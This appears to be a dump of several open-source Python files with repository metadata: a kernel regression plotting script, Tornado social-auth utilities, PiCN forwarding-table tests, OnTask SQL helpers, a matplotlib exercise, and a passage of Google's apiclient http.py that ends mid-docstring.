0b3f6e4d649de1514c6ac424df9b90f75e2ae589 | 4,429 | py | Python | preprocessing/plot_kernel_regression.py | GPrathap/OpenBCIPython | 0f5be167fb09d31c15885003eeafec8cdc08dbfa | [
"MIT"
] | 1 | 2021-11-07T12:01:08.000Z | 2021-11-07T12:01:08.000Z | preprocessing/plot_kernel_regression.py | GPrathap/OpenBCIPython | 0f5be167fb09d31c15885003eeafec8cdc08dbfa | [
"MIT"
] | null | null | null | preprocessing/plot_kernel_regression.py | GPrathap/OpenBCIPython | 0f5be167fb09d31c15885003eeafec8cdc08dbfa | [
"MIT"
] | 1 | 2020-10-15T08:35:01.000Z | 2020-10-15T08:35:01.000Z | """
========================================================================
Comparison of kernel regression (KR) and support vector regression (SVR)
========================================================================
Toy example of 1D regression using kernel regression (KR) and support vector
regression (SVR). KR provides an efficient way of selecting a kernel's
bandwidth via leave-one-out cross-validation, which is considerably faster
that an explicit grid-search as required by SVR. The main disadvantages are
that it does not support regularization and is not robust to outliers.
"""
from py_qt import bootstrap as bs
import matplotlib.pyplot as plt
from py_qt import npr_methods
import numpy as np
from py_qt import nonparam_regression as smooth
from py_qt import plot_fit
import tensorflow as tf
import requests
import time
import numpy as np
from sklearn.svm import SVR
from sklearn.grid_search import GridSearchCV
from sklearn.learning_curve import learning_curve
import matplotlib.pyplot as plt
from kernel_regression import KernelRegression
np.random.seed(0)
def f(x):
return 3*np.cos(x/2) + x**2/5 + 3
xs = np.random.rand(200) * 10
ys = f(xs) + 2*np.random.randn(*xs.shape)
birthdata_url = 'https://www.umass.edu/statdata/statdata/data/lowbwt.dat'
birth_file = requests.get(birthdata_url)
birth_data = birth_file.text.split('\r\n')[5:]
birth_header = [x for x in birth_data[0].split(' ') if len(x) >= 1]
birth_data = [[float(x) for x in y.split(' ') if len(x) >= 1] for y in birth_data[1:] if len(y) >= 1]
# Pull out target variable
y_vals = np.array([x[1] for x in birth_data])
# Pull out predictor variables (not id, not target, and not birthweight)
x_vals = np.array([x[2:9] for x in birth_data])
# Split data into train/test = 80%/20%
train_indices = np.random.choice(len(x_vals), int(round(len(x_vals) * 0.8)), replace=False)
test_indices = np.array(list(set(range(len(x_vals))) - set(train_indices)))
x_vals_train = x_vals[train_indices]
x_vals_test = x_vals[test_indices]
y_vals_train = y_vals[train_indices]
y_vals_test = y_vals[test_indices]
# Normalize by column (min-max norm)
def normalize_cols(m):
col_max = m.max(axis=0)
col_min = m.min(axis=0)
return (m - col_min) / (col_max - col_min)
x_vals_train = np.nan_to_num(normalize_cols(x_vals_train))
x_vals_test = np.nan_to_num(normalize_cols(x_vals_test))
###############################################################################
# Generate sample data
# X = np.sort(5 * np.random.rand(100, 1), axis=0)
# y = np.sin(X).ravel()
X=x_vals_train
y=y_vals_train
###############################################################################
# Add noise to targets
y += 0.5 * (0.5 - np.random.rand(y.size))
###############################################################################
# Fit regression models
svr = GridSearchCV(SVR(kernel='rbf'), cv=5,
param_grid={"C": [1e-1, 1e0, 1e1, 1e2],
"gamma": np.logspace(-2, 2, 10)})
kr = KernelRegression(kernel="rbf", gamma=np.logspace(-2, 2, 10))
t0 = time.time()
y_svr = svr.fit(X, y).predict(X)
print("SVR complexity and bandwidth selected and model fitted in %.3f s" \
% (time.time() - t0))
t0 = time.time()
y_kr = kr.fit(X, y).predict(X)
print("KR including bandwith fitted in %.3f s"% (time.time() - t0))
###############################################################################
# Visualize models
plt.scatter(X, y, c='k', label='data')
plt.hold('on')
plt.plot(X, y_kr, c='g', label='Kernel Regression')
plt.plot(X, y_svr, c='r', label='SVR')
plt.xlabel('data')
plt.ylabel('target')
plt.title('Kernel regression versus SVR')
plt.legend()
# Visualize learning curves
plt.figure()
train_sizes, train_scores_svr, test_scores_svr = \
learning_curve(svr, X, y, train_sizes=np.linspace(0.1, 1, 10),
scoring="mean_squared_error", cv=10)
train_sizes_abs, train_scores_kr, test_scores_kr = \
learning_curve(kr, X, y, train_sizes=np.linspace(0.1, 1, 10),
scoring="mean_squared_error", cv=10)
plt.plot(train_sizes, test_scores_svr.mean(1), 'o-', color="r",
label="SVR")
plt.plot(train_sizes, test_scores_kr.mean(1), 'o-', color="g",
label="Kernel Regression")
plt.yscale("symlog", linthreshy=1e-7)
plt.ylim(-10, -0.01)
plt.xlabel("Training size")
plt.ylabel("Mean Squared Error")
plt.title('Learning curves')
plt.legend(loc="best")
plt.show()
| 35.150794 | 101 | 0.631971 | 686 | 4,429 | 3.934402 | 0.3207 | 0.024083 | 0.018525 | 0.020748 | 0.248981 | 0.181549 | 0.111152 | 0.095591 | 0.040015 | 0.040015 | 0 | 0.022519 | 0.137729 | 4,429 | 125 | 102 | 35.432 | 0.684211 | 0.211109 | 0 | 0.101266 | 0 | 0 | 0.113924 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025316 | false | 0 | 0.189873 | 0.012658 | 0.240506 | 0.025316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b423c3af1b307b18229f2f9a8d00f1559c2e66f | 1,368 | py | Python | modules/plugin_social_auth/social/apps/tornado_app/utils.py | KallyMilton/w2p-social-auth | 75b03b0927bb7b2cd46825d64896dfa5b3a6de3b | [
"BSD-3-Clause"
] | 1 | 2015-11-05T07:12:28.000Z | 2015-11-05T07:12:28.000Z | modules/plugin_social_auth/social/apps/tornado_app/utils.py | KallyMilton/w2p-social-auth | 75b03b0927bb7b2cd46825d64896dfa5b3a6de3b | [
"BSD-3-Clause"
] | null | null | null | modules/plugin_social_auth/social/apps/tornado_app/utils.py | KallyMilton/w2p-social-auth | 75b03b0927bb7b2cd46825d64896dfa5b3a6de3b | [
"BSD-3-Clause"
] | 1 | 2020-10-26T04:57:36.000Z | 2020-10-26T04:57:36.000Z | from functools import wraps
from social.utils import setting_name
from social.strategies.utils import get_strategy
DEFAULTS = {
'STORAGE': 'social.apps.tornado_app.models.TornadoStorage',
'STRATEGY': 'social.strategies.tornado_strategy.TornadoStrategy'
}
def get_helper(request_handler, name):
return request_handler.settings.get(setting_name(name),
DEFAULTS.get(name, None))
def load_strategy(request_handler, *args, **kwargs):
backends = get_helper(request_handler, 'AUTHENTICATION_BACKENDS')
strategy = get_helper(request_handler, 'STRATEGY')
storage = get_helper(request_handler, 'STORAGE')
return get_strategy(backends, strategy, storage, request_handler.request,
request_handler=request_handler, *args, **kwargs)
def strategy(redirect_uri=None):
def decorator(func):
@wraps(func)
def wrapper(self, backend, *args, **kwargs):
uri = redirect_uri
if uri and not uri.startswith('/'):
uri = self.reverse_url(uri, backend)
self.strategy = load_strategy(self,
backend=backend,
redirect_uri=uri, *args, **kwargs)
return func(self, backend, *args, **kwargs)
return wrapper
return decorator
| 35.076923 | 77 | 0.633772 | 143 | 1,368 | 5.881119 | 0.307692 | 0.149822 | 0.0761 | 0.109394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.270468 | 1,368 | 38 | 78 | 36 | 0.842685 | 0 | 0 | 0 | 0 | 0 | 0.108918 | 0.086257 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.103448 | 0.034483 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b426d59d0b0d30a0b7c918e48d8545051ad999e | 5,681 | py | Python | PiCN/Layers/ICNLayer/ForwardingInformationBase/test/test_ForwardingInformationBasePrefix.py | DimaMansour/PiCN | 90ced1cde2a8fd457e873e8bbad1fd7c21bbe56b | [
"BSD-3-Clause"
] | null | null | null | PiCN/Layers/ICNLayer/ForwardingInformationBase/test/test_ForwardingInformationBasePrefix.py | DimaMansour/PiCN | 90ced1cde2a8fd457e873e8bbad1fd7c21bbe56b | [
"BSD-3-Clause"
] | null | null | null | PiCN/Layers/ICNLayer/ForwardingInformationBase/test/test_ForwardingInformationBasePrefix.py | DimaMansour/PiCN | 90ced1cde2a8fd457e873e8bbad1fd7c21bbe56b | [
"BSD-3-Clause"
] | null | null | null | """Test of in-memory Forwarding Information Base using longest prefix matching"""
import multiprocessing
import unittest
from PiCN.Layers.ICNLayer.ForwardingInformationBase import ForwardingInformationBaseMemoryPrefix
from PiCN.Packets import Name
class test_ForwardingInformationBaseMemoryPrefix(unittest.TestCase):
"""Test of in-memory Forwarding Information Base using longest prefix matching"""
def setUp(self):
self.manager = multiprocessing.Manager()
self.fib = ForwardingInformationBaseMemoryPrefix()
def tearDown(self):
pass
def test_add_entry_to_fib(self):
"""Test add entry to fib"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
def test_find_entry_to_fib(self):
"""Test finding a fib entry"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
fib_entry = self.fib.find_fib_entry(name)
self.assertEqual(fib_entry.name, name)
self.assertEqual(fib_entry.faceid, fid)
def test_find_entry_to_fib_multiple_entries(self):
"""Test finding a fib entry with multiple entries"""
fid1 = [1]
fid2 = [2]
name1 = Name("/test/data")
name2 = Name("/data/test")
self.fib.add_fib_entry(name2, fid2)
self.fib.add_fib_entry(name1, fid1)
entry = self.fib._container[1]
self.assertEqual(entry.name, name2)
self.assertEqual(entry.faceid, fid2)
fib_entry = self.fib.find_fib_entry(name1)
self.assertEqual(fib_entry.name, name1)
self.assertEqual(fib_entry.faceid, fid1)
def test_find_entry_to_fib_longest_match(self):
"""Test finding a fib using a longest match"""
fid1 = [1]
fid2 = [2]
name1 = Name("/test/data")
name2 = Name("/data")
name3 = Name("/test/data/object")
name4 = Name("/data/object/content")
self.fib.add_fib_entry(name1, fid1)
self.fib.add_fib_entry(name2, fid2)
fib_entry1 = self.fib.find_fib_entry(name3)
fib_entry2 = self.fib.find_fib_entry(name4)
self.assertEqual(fib_entry1.name, name1)
self.assertEqual(fib_entry2.name, name2)
self.assertEqual(fib_entry1.faceid, fid1)
self.assertEqual(fib_entry2.faceid, fid2)
def test_find_entry_to_fib_no_match(self):
"""Test finding a fib entry with no match"""
fid = [1]
name1 = Name("/test/data")
name2 = Name("/data/test")
self.fib.add_fib_entry(name1, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name1)
self.assertEqual(entry.faceid, fid)
fib_entry = self.fib.find_fib_entry(name2)
self.assertEqual(fib_entry, None)
def test_remove_entry_to_fib(self):
"""Test remove a fib entry"""
fid = [1]
name = Name("/test/data")
self.fib.add_fib_entry(name, fid)
entry = self.fib._container[0]
self.assertEqual(entry.name, name)
self.assertEqual(entry.faceid, fid)
self.fib.remove_fib_entry(name)
#TODO CHECK
def test_get_already_used_fib_face(self):
"""Test to get a fib entry if there are alreay used all faces of another one"""
fid1 = [1]
fid2 = [2]
fid3 = [3]
n1 = Name("/test/data/content")
n2 = Name("/test")
n3 = Name("/test/data")
already_used = []
self.fib.add_fib_entry(n1, fid1)
self.fib.add_fib_entry(n2, fid2)
self.fib.add_fib_entry(n3, fid3)
iname = Name("/test/data/content/object1")
#test best match
fib_entry = self.fib.find_fib_entry(iname)
self.assertEqual(fib_entry.faceid, fid1)
already_used.extend(fib_entry.faceid)
print(already_used)
# test 2nd best match
fib_entry = self.fib.find_fib_entry(iname, already_used)
print(fib_entry.name)
self.assertEqual(fib_entry.faceid, fid3)
already_used.extend(fib_entry.faceid)
print(already_used)
# # test 3rd best match
fib_entry = self.fib.find_fib_entry(iname, already_used)
print(fib_entry.name)
self.assertEqual(fib_entry.faceid, fid2)
already_used.extend(fib_entry.faceid)
print(already_used)
# test no match anymore best match
fib_entry = self.fib.find_fib_entry(iname, already_used)
self.assertEqual(fib_entry, None)
def test_clear(self):
self.fib.add_fib_entry(Name('/test/foo'), [42], static=True)
self.fib.add_fib_entry(Name('/test/bar'), [1337], static=False)
self.assertEqual(2, len(self.fib.container))
self.fib.clear()
self.assertEqual(1, len(self.fib.container))
self.assertIsNotNone(self.fib.find_fib_entry(Name('/test/foo')))
def test_add_faceid_to_entry(self):
self.fib.add_fib_entry(Name('/test/foo'), [42], static=True)
self.fib.add_fib_entry(Name('/test/bar'), [1337], static=False)
self.assertEqual(2, len(self.fib.container))
self.fib.add_faceid_to_entry(Name("/test/bar"), 21)
entry = self.fib.find_fib_entry(Name("/test/bar"))
self.assertEqual([1337, 21], entry.faceid)
self.fib.add_faceid_to_entry(Name("/test/bar"), 21)
entry = self.fib.find_fib_entry(Name("/test/bar"))
self.assertEqual([1337, 21], entry.faceid)
| 38.385135 | 96 | 0.641436 | 760 | 5,681 | 4.603947 | 0.131579 | 0.123464 | 0.048585 | 0.05573 | 0.712775 | 0.652472 | 0.58874 | 0.50443 | 0.50443 | 0.488425 | 0 | 0.024249 | 0.23781 | 5,681 | 147 | 97 | 38.646259 | 0.783834 | 0.092061 | 0 | 0.533898 | 0 | 0 | 0.051312 | 0.005092 | 0 | 0 | 0 | 0.006803 | 0.245763 | 1 | 0.09322 | false | 0.008475 | 0.033898 | 0 | 0.135593 | 0.042373 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b431ce8fefefcf4217b9af1eca65bc47a423d7f | 8,103 | py | Python | ontask/dataops/sql/table_queries.py | LucasFranciscoCorreia/ontask_b | 5473e9faa24c71a2a1102d47ebc2cbf27608e42a | [
"MIT"
] | null | null | null | ontask/dataops/sql/table_queries.py | LucasFranciscoCorreia/ontask_b | 5473e9faa24c71a2a1102d47ebc2cbf27608e42a | [
"MIT"
] | null | null | null | ontask/dataops/sql/table_queries.py | LucasFranciscoCorreia/ontask_b | 5473e9faa24c71a2a1102d47ebc2cbf27608e42a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Direct SQL operations in the DB."""
import logging
from typing import Any, Dict, List, Mapping, Optional, Tuple
from django.db import connection
from psycopg2 import sql
from ontask import OnTaskDBIdentifier
from ontask.dataops.formula import EVAL_SQL, evaluate_formula
logger = logging.getLogger('ontask')
def clone_table(table_from: str, table_to: str):
"""Clone a table in the database.
:param table_from: Source table.
:param table_to: New table.
"""
with connection.connection.cursor() as cursor:
cursor.execute(sql.SQL('CREATE TABLE {0} AS TABLE {1}').format(
sql.Identifier(table_to),
sql.Identifier(table_from)))
def rename_table(table: str, new_name: str):
"""Rename a table in the database.
:param table: Current table name
:param new_name: New table name
:return: Nothing. Change reflected in the database table
"""
with connection.connection.cursor() as cursor:
cursor.execute(sql.SQL('ALTER TABLE {0} RENAME TO {1}').format(
sql.Identifier(table),
sql.Identifier(new_name),
))
def get_boolean_clause(
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
conjunction: bool = True,
) -> Tuple[sql.Composed, List]:
"""Create the boolean clause based on a formula and a list of pairs.
Create the SQL boolean clause to be added to a query by combining a
formula and a dictionary with key:value pairs. Both of them are optional
and are combined through conjunction/disjunction depending on the
conjunction variable.
:param filter_formula: Boolean formula
:param filter_pairs: Dictionary of key/value pairs.
:param conjunction: Boolean stating if the clauses need to be in a
conjunction.
:return: SQL clause and list of fields.
"""
clause = None
clause_fields = []
if filter_formula:
# There is a filter
clause, clause_fields = evaluate_formula(filter_formula, EVAL_SQL)
if filter_pairs:
c_txt = ' AND ' if conjunction else ' OR '
pairs_clause = sql.SQL(c_txt).join([
sql.SQL('{0} = {1}').format(
OnTaskDBIdentifier(key), sql.Placeholder())
for key, __ in filter_pairs.items()
])
pairs_fields = [lit_val for __, lit_val in filter_pairs.items()]
if clause:
clause = clause + sql.SQL(' AND ') + pairs_clause
clause_fields += pairs_fields
else:
clause = pairs_clause
clause_fields = pairs_fields
return clause, clause_fields
def get_select_query(
table_name: str,
column_names: Optional[List[str]] = None,
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
) -> Tuple[sql.Composed, List[Any]]:
"""Calculate pair query, fields to execute a select statement.
:param table_name: Table to query
:param column_names: list of columns to consider or None to consider all
:param filter_formula: Text filter expression
:param filter_pairs: Dictionary of key/value pairs.
:return: (sql query, sql params)
"""
if column_names:
query = sql.SQL('SELECT {0} FROM {1}').format(
sql.SQL(', ').join([
OnTaskDBIdentifier(cname) for cname in column_names
]),
sql.Identifier(table_name),
)
else:
query = sql.SQL('SELECT * FROM {0}').format(sql.Identifier(table_name))
query_fields = []
if filter_formula or filter_pairs:
bool_clause, query_fields = get_boolean_clause(
filter_formula=filter_formula,
filter_pairs=filter_pairs,
)
if bool_clause:
query = query + sql.SQL(' WHERE ') + bool_clause
return query, query_fields
def get_select_query_txt(
table_name: str,
column_names: Optional[List[str]] = None,
filter_formula: Optional[Dict] = None,
filter_pairs: Optional[Mapping] = None,
) -> Tuple[str, List[Any]]:
"""Calculate the text representation of a query to select table subset.
:param table_name: Table to query
:param column_names: list of columns to consider or None to consider all
:param filter_formula: Text filter expression
:param filter_pairs: Dictionary of key/value pairs.
:return: (sql query, sql params)
"""
# invoke get_select_query and transform into string
query_str, fields = get_select_query(
table_name,
column_names=column_names,
filter_formula=filter_formula,
filter_pairs=filter_pairs,
)
return query_str.as_string(connection.connection), fields
def search_table(
table_name: str,
search_value: str,
columns_to_search: Optional[List] = None,
filter_formula: Optional[Dict] = None,
any_join: bool = True,
order_col_name: str = None,
order_asc: bool = True,
):
"""Search the content of all cells in the table.
Select rows where for every (column, value) pair, column contains value (
as in LIKE %value%, these are combined with OR if any is TRUE, or AND if
any is false, and the result is ordered by the given column and type (if
given)
:param table_name: table name
:param filter_formula: Optional filter condition to pre filter the query
:param columns_to_search: A column, value, type tuple to search the value
in the column set. the query is built with these terms as requirement AND
the cv_tuples.
:param any_join: Boolean encoding if values should be combined with OR (or
AND)
:param order_col_name: Order results by this column
:param order_asc: Order results in ascending values (or descending)
:param search_value: String to search
:return: The resulting query set
"""
# Create the query
if columns_to_search:
query = sql.SQL('SELECT {0} FROM {1}').format(
sql.SQL(', ').join([
OnTaskDBIdentifier(colname) for colname in columns_to_search
]),
sql.Identifier(table_name),
)
else:
query = sql.SQL('SELECT * from {1}').format(sql.Identifier(table_name))
query_fields = []
where_clause = sql.SQL('')
# Add filter part if present
if filter_formula:
filter_query, filter_fields = evaluate_formula(
filter_formula,
EVAL_SQL)
if filter_query:
where_clause = filter_query
query_fields += filter_fields
# Add the CAST {0} AS TEXT LIKE ...
if search_value:
if where_clause != sql.SQL(''):
where_clause = where_clause + sql.SQL(' AND ')
# Combine the search subqueries
if any_join:
conn_txt = ' OR '
else:
conn_txt = ' AND '
where_clause = where_clause + sql.SQL(conn_txt).join([
sql.SQL('(CAST ({0} AS TEXT) LIKE %s)').format(
OnTaskDBIdentifier(cname),
) for cname in columns_to_search
])
query_fields += ['%' + search_value + '%'] * len(columns_to_search)
if where_clause != sql.SQL(''):
query = query + sql.SQL(' WHERE ') + where_clause
# Add the order if needed
if order_col_name:
query = query + sql.SQL(' ORDER BY {0}').format(
OnTaskDBIdentifier(order_col_name))
if not order_asc:
query = query + sql.SQL(' DESC')
# Execute the query
with connection.connection.cursor() as cursor:
cursor.execute(query, query_fields)
search_result = cursor.fetchall()
return search_result
def delete_table(table_name: str):
"""Delete the given table.
:param table_name: Table to delete
:return: Drop the table in the DB
"""
query = sql.SQL('DROP TABLE IF EXISTS {0}').format(sql.Identifier(table_name))
try:
with connection.connection.cursor() as cursor:
cursor.execute(query)
except Exception as exc:
logger.error('Error when dropping table %s: %s', table_name, str(exc))
| 29.900369 | 82 | 0.644946 | 1,055 | 8,103 | 4.794313 | 0.170616 | 0.026097 | 0.019573 | 0.023725 | 0.390668 | 0.325227 | 0.288256 | 0.261368 | 0.234282 | 0.192764 | 0 | 0.003013 | 0.262619 | 8,103 | 270 | 83 | 30.011111 | 0.843515 | 0.316303 | 0 | 0.291971 | 0 | 0 | 0.055745 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051095 | false | 0 | 0.043796 | 0 | 0.124088 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4595e4dd7724597e829e6e45babed1bcdac747 | 761 | py | Python | plottask.py | Osheah/PFORCS-problem-sheet | 249988e2515377cb13c2b4cc6ece7b8108a41f4b | [
"Apache-2.0"
] | null | null | null | plottask.py | Osheah/PFORCS-problem-sheet | 249988e2515377cb13c2b4cc6ece7b8108a41f4b | [
"Apache-2.0"
] | null | null | null | plottask.py | Osheah/PFORCS-problem-sheet | 249988e2515377cb13c2b4cc6ece7b8108a41f4b | [
"Apache-2.0"
] | null | null | null | # program that displays a plot of the functions f(x) = x, g(x) = x**2, h(x) = x**3 and make the plot look fancy
# helen oshea
# 20210311
# import the modules
import numpy as np # needed for creating the x axis
import matplotlib.pyplot as plt # needed for ploting
x = np.arange(0,4, .1) # create the x axis
fx= x # the line y = x
gx = x**2 # the curve y = x squared
hx = x**3 # the curve y = x cubed
plt.title('plot of x, x**2, x**3') # the title of the plot
plt.xlabel('x') # the x axis label
plt.ylabel('y') # the y axis label
plt.plot(x, fx, label='x') # the line
plt.plot(x, gx, label='x**2') # the quadratic curve
plt.plot(x, hx, label='x**3') # the cubic curve
plt.legend() # show the labels
plt.savefig('plottask.jpg')
plt.show() # show the plot
| 29.269231 | 112 | 0.653088 | 151 | 761 | 3.291391 | 0.390728 | 0.016097 | 0.04829 | 0.040241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031199 | 0.199737 | 761 | 25 | 113 | 30.44 | 0.784893 | 0.538765 | 0 | 0 | 0 | 0 | 0.132931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b45a446f6d5636d66d05baadfd7fd6d3449dfb0 | 20,876 | py | Python | lib/apiclient/http.py | alecdotico/engineauth | def523f6c0d48f346e552b6638e6f3a6a1717733 | [
"Apache-2.0"
] | 1 | 2015-12-14T10:37:52.000Z | 2015-12-14T10:37:52.000Z | lib/apiclient/http.py | alecdotico/engineauth | def523f6c0d48f346e552b6638e6f3a6a1717733 | [
"Apache-2.0"
] | null | null | null | lib/apiclient/http.py | alecdotico/engineauth | def523f6c0d48f346e552b6638e6f3a6a1717733 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes to encapsulate a single HTTP request.
The classes implement a command pattern, with every
object supporting an execute() method that does the
actuall HTTP request.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
__all__ = [
'HttpRequest', 'RequestMockBuilder', 'HttpMock'
'set_user_agent', 'tunnel_patch'
]
import copy
import httplib2
import os
import mimeparse
import mimetypes
from model import JsonModel
from errors import HttpError
from errors import ResumableUploadError
from errors import UnexpectedBodyError
from errors import UnexpectedMethodError
from anyjson import simplejson
class MediaUploadProgress(object):
"""Status of a resumable upload."""
def __init__(self, resumable_progress, total_size):
"""Constructor.
Args:
resumable_progress: int, bytes sent so far.
total_size: int, total bytes in complete upload.
"""
self.resumable_progress = resumable_progress
self.total_size = total_size
def progress(self):
"""Percent of upload completed, as a float."""
return float(self.resumable_progress)/float(self.total_size)
class MediaUpload(object):
"""Describes a media object to upload.
Base class that defines the interface of MediaUpload subclasses.
"""
def getbytes(self, begin, end):
raise NotImplementedError()
def size(self):
raise NotImplementedError()
def chunksize(self):
raise NotImplementedError()
def mimetype(self):
return 'application/octet-stream'
def resumable(self):
return False
def _to_json(self, strip=None):
"""Utility function for creating a JSON representation of a MediaUpload.
Args:
strip: array, An array of names of members to not include in the JSON.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
t = type(self)
d = copy.copy(self.__dict__)
if strip is not None:
for member in strip:
del d[member]
d['_class'] = t.__name__
d['_module'] = t.__module__
return simplejson.dumps(d)
def to_json(self):
"""Create a JSON representation of an instance of MediaUpload.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json()
@classmethod
def new_from_json(cls, s):
"""Utility class method to instantiate a MediaUpload subclass from a JSON
representation produced by to_json().
Args:
s: string, JSON from to_json().
Returns:
An instance of the subclass of MediaUpload that was serialized with
to_json().
"""
data = simplejson.loads(s)
# Find and call the right classmethod from_json() to restore the object.
module = data['_module']
m = __import__(module, fromlist=module.split('.')[:-1])
kls = getattr(m, data['_class'])
from_json = getattr(kls, 'from_json')
return from_json(s)
class MediaFileUpload(MediaUpload):
"""A MediaUpload for a file.
Construct a MediaFileUpload and pass as the media_body parameter of the
method. For example, if we had a service that allowed uploading images:
media = MediaFileUpload('smiley.png', mimetype='image/png', chunksize=1000,
resumable=True)
service.objects().insert(
bucket=buckets['items'][0]['id'],
name='smiley.png',
media_body=media).execute()
"""
def __init__(self, filename, mimetype=None, chunksize=10000, resumable=False):
"""Constructor.
Args:
filename: string, Name of the file.
mimetype: string, Mime-type of the file. If None then a mime-type will be
guessed from the file extension.
chunksize: int, File will be uploaded in chunks of this many bytes. Only
used if resumable=True.
resumable: bool, True if this is a resumable upload. False means upload in
a single request.
"""
self._filename = filename
self._size = os.path.getsize(filename)
self._fd = None
if mimetype is None:
(mimetype, encoding) = mimetypes.guess_type(filename)
self._mimetype = mimetype
self._chunksize = chunksize
self._resumable = resumable
def mimetype(self):
return self._mimetype
def size(self):
return self._size
def chunksize(self):
return self._chunksize
def resumable(self):
return self._resumable
def getbytes(self, begin, length):
"""Get bytes from the media.
Args:
begin: int, offset from beginning of file.
length: int, number of bytes to read, starting at begin.
Returns:
A string of bytes read. May be shorted than length if EOF was reached
first.
"""
if self._fd is None:
self._fd = open(self._filename, 'rb')
self._fd.seek(begin)
return self._fd.read(length)
def to_json(self):
"""Creating a JSON representation of an instance of Credentials.
Returns:
string, a JSON representation of this instance, suitable to pass to
from_json().
"""
return self._to_json(['_fd'])
@staticmethod
def from_json(s):
d = simplejson.loads(s)
return MediaFileUpload(
d['_filename'], d['_mimetype'], d['_chunksize'], d['_resumable'])
class HttpRequest(object):
"""Encapsulates a single HTTP request.
"""
def __init__(self, http, postproc, uri,
method='GET',
body=None,
headers=None,
methodId=None,
resumable=None):
"""Constructor for an HttpRequest.
Args:
http: httplib2.Http, the transport object to use to make a request
postproc: callable, called on the HTTP response and content to transform
it into a data object before returning, or raising an exception
on an error.
uri: string, the absolute URI to send the request to
method: string, the HTTP method to use
body: string, the request body of the HTTP request,
headers: dict, the HTTP request headers
methodId: string, a unique identifier for the API method being called.
resumable: MediaUpload, None if this is not a resumbale request.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers or {}
self.methodId = methodId
self.http = http
self.postproc = postproc
self.resumable = resumable
major, minor, params = mimeparse.parse_mime_type(
headers.get('content-type', 'application/json'))
self.multipart_boundary = params.get('boundary', '').strip('"')
# If this was a multipart resumable, the size of the non-media part.
self.multipart_size = 0
# The resumable URI to send chunks to.
self.resumable_uri = None
# The bytes that have been uploaded.
self.resumable_progress = 0
if resumable is not None:
if self.body is not None:
self.multipart_size = len(self.body)
else:
self.multipart_size = 0
self.total_size = self.resumable.size() + self.multipart_size + len(self.multipart_boundary)
def execute(self, http=None):
"""Execute the request.
Args:
http: httplib2.Http, an http object to be used in place of the
one the HttpRequest request object was constructed with.
Returns:
A deserialized object model of the response body as determined
by the postproc.
Raises:
apiclient.errors.HttpError if the response was not a 2xx.
httplib2.Error if a transport error has occured.
"""
if http is None:
http = self.http
if self.resumable:
body = None
while body is None:
_, body = self.next_chunk(http)
return body
else:
resp, content = http.request(self.uri, self.method,
body=self.body,
headers=self.headers)
if resp.status >= 300:
raise HttpError(resp, content, self.uri)
return self.postproc(resp, content)
def next_chunk(self, http=None):
"""Execute the next step of a resumable upload.
Can only be used if the method being executed supports media uploads and the
MediaUpload object passed in was flagged as using resumable upload.
Example:
media = MediaFileUpload('smiley.png', mimetype='image/png', chunksize=1000,
resumable=True)
request = service.objects().insert(
bucket=buckets['items'][0]['id'],
name='smiley.png',
media_body=media)
response = None
while response is None:
status, response = request.next_chunk()
if status:
print "Upload %d%% complete." % int(status.progress() * 100)
Returns:
(status, body): (ResumableMediaStatus, object)
